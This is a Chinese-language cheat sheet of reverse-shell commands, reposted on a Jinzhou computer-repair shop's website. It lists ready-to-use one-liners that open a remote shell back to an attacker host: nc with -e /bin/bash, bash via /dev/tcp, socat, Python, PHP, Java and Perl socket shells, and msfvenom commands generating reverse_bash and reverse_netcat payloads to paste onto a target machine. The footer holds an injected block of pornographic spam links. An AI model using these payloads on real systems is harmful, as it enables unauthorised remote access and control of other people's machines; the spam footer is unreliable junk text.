錦州市廣廈電腦維修|上門維修電腦|上門做系統|0416-3905144熱誠服務,錦州廣廈維修電腦,公司IT外包服務
topFlag1 設為首頁
topFlag3 收藏本站
 
maojin003 首 頁 公司介紹 服務項目 服務報價 維修流程 IT外包服務 服務器維護 技術文章 常見故障
錦州市廣廈電腦維修|上門維修電腦|上門做系統|0416-3905144熱誠服務技術文章
反彈shell命令總結

作者: 佚名  日期:2023-07-13 17:19:21   來源: 本站整理

反彈shell命令總結

1.nc反彈

開啟本地8080端口監聽,并將本地的bash發布出去。
root# nc -lvvp 8080 -t -e /bin/bash
在這里插入圖片描述

連接目標主機
nc ip 端口
在這里插入圖片描述

2.bash直接反彈

kali監聽
在這里插入圖片描述
靶機運行:
root# bash -i >& /dev/tcp/ip/端口 0>&1
在這里插入圖片描述
bash命令解析:
在這里插入圖片描述
反彈成功
在這里插入圖片描述

3. socat反彈

kali監聽:socat tcp-listen:1234 -
在這里插入圖片描述
靶機運行:
socat exec:‘bash -li’,pty,stderr,setsid,sigint,sane tcp:IP:1234
在這里插入圖片描述
反彈成功
在這里插入圖片描述

4.腳本反彈

4.1:python反彈

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);

s.connect(("IP",Port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' 

4.2:php反彈

php -r '$sock=fsockopen("IP",PORT);exec("/bin/sh -i <&3 >&3 2>&3");' 

4.3:java反彈

r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/IP/port;cat <&5 |

while read line; do $line 2>&5 >&5; done"] as String[]) p.waitFor() 

4.4:perl反彈

perl -e 'use Socket;$i="IP";$p=PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));

if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' 

.msf獲取反彈一句話

可以直接使用 msfvenom -l 結合關鍵字過濾(如cmd/unix/reverse),找出需要的各類反彈一句話payload的路徑信息。

# msfvenom -l payloads 'cmd/unix/reverse' 

發現msf支持反彈shell類型豐富。可以根據需求選擇。

在這里插入圖片描述
例如:生成bash的

# root@kali:~# msfvenom -p cmd/unix/reverse_bash lhost=1.1.1.1 lport=6666 R 

將生成的payload粘貼,在靶機運行即可。
在這里插入圖片描述
生成netcat

msfvenom -p cmd/unix/reverse_netcat lhost=1.1.1.1 lport=12345 R 

將生成的payload粘貼,在靶機運行即可。
在這里插入圖片描述
靶機運行payload:
在這里插入圖片描述
成功反彈
在這里插入圖片描述



熱門文章
  • L1正則化和L2正則化
  • 在Linux系統下,可以使用以下方法和...
  • 主板型號怎么看?小編將給大家介紹...
  • win10在激活界面會提示無法訪問激活...
  • 360日歷怎么卸載?360日歷怎么徹底...
  • 墨魚丸是什么怎么卸載?墨魚丸視頻...
  • Win10打開壓縮文件提示安全警告的解...
  • Linux高頻常用指令匯總
  • 150個CMD命令(史上更全cmd命令 net...
  • 線性回歸算法
  • HTTPS和HTTP的主要區別
  • Oracle 炮轟、Ubuntu 看戲,紅帽被...
  • 錦州廣廈電腦上門維修

    報修電話:13840665804  QQ:174984393 (聯系人:毛先生)   
    E-Mail:174984393@qq.com
    維修中心地址:錦州廣廈電腦城
    ICP備案/許可證號:遼ICP備2023002984號-1
    上門服務區域: 遼寧錦州市區
    主要業務: 修電腦,電腦修理,電腦維護,上門維修電腦,黑屏藍屏死機故障排除,無線上網設置,IT服務外包,局域網組建,ADSL共享上網,路由器設置,數據恢復,密碼破解,光盤刻錄制作等服務

    技術支持:微軟等
    主站蜘蛛池模板: 免费无码又爽又刺激高潮视频| 久久精品aⅴ无码中文字字幕不卡 久久精品aⅴ无码中文字字幕重口 | 无码国产色欲XXXX视频| 国产AV无码专区亚洲Av| 免费A级毛片无码无遮挡内射 | 久久久久亚洲AV无码麻豆| 日韩毛片免费无码无毒视频观看 | 日韩免费无码一区二区三区| 无码国产精品一区二区免费I6 | 亚洲Av无码乱码在线播放| 亚洲男人第一无码aⅴ网站| 人妻丰满AV无码久久不卡| av无码一区二区三区| 亚洲一区二区无码偷拍| 亚洲欧洲无码AV电影在线观看 | 熟妇人妻中文字幕无码老熟妇| 久久久久久99av无码免费网站| 亚洲大尺度无码专区尤物| 日韩人妻无码精品无码中文字幕| 亚洲AV无码一区东京热久久| 久久99久久无码毛片一区二区| 国产怡春院无码一区二区| 精品无码久久久久久午夜| 亚洲午夜国产精品无码| 超清纯白嫩大学生无码网站| 啊灬啊别停灬用力啊无码视频| 久久无码专区国产精品| 97无码人妻福利免费公开在线视频| 色综合久久久无码中文字幕波多| 久久精品国产亚洲AV无码偷窥| 午夜福利无码不卡在线观看 | 无码人妻少妇色欲AV一区二区| 宅男在线国产精品无码| 人妻av无码专区| 亚洲AV永久无码精品一区二区国产| 熟妇人妻无码中文字幕老熟妇 | 精品无码久久久久久久久水蜜桃| 亚洲午夜无码久久久久软件| 亚洲人片在线观看天堂无码| 亚洲中文字幕在线无码一区二区| 日韩人妻无码精品一专区|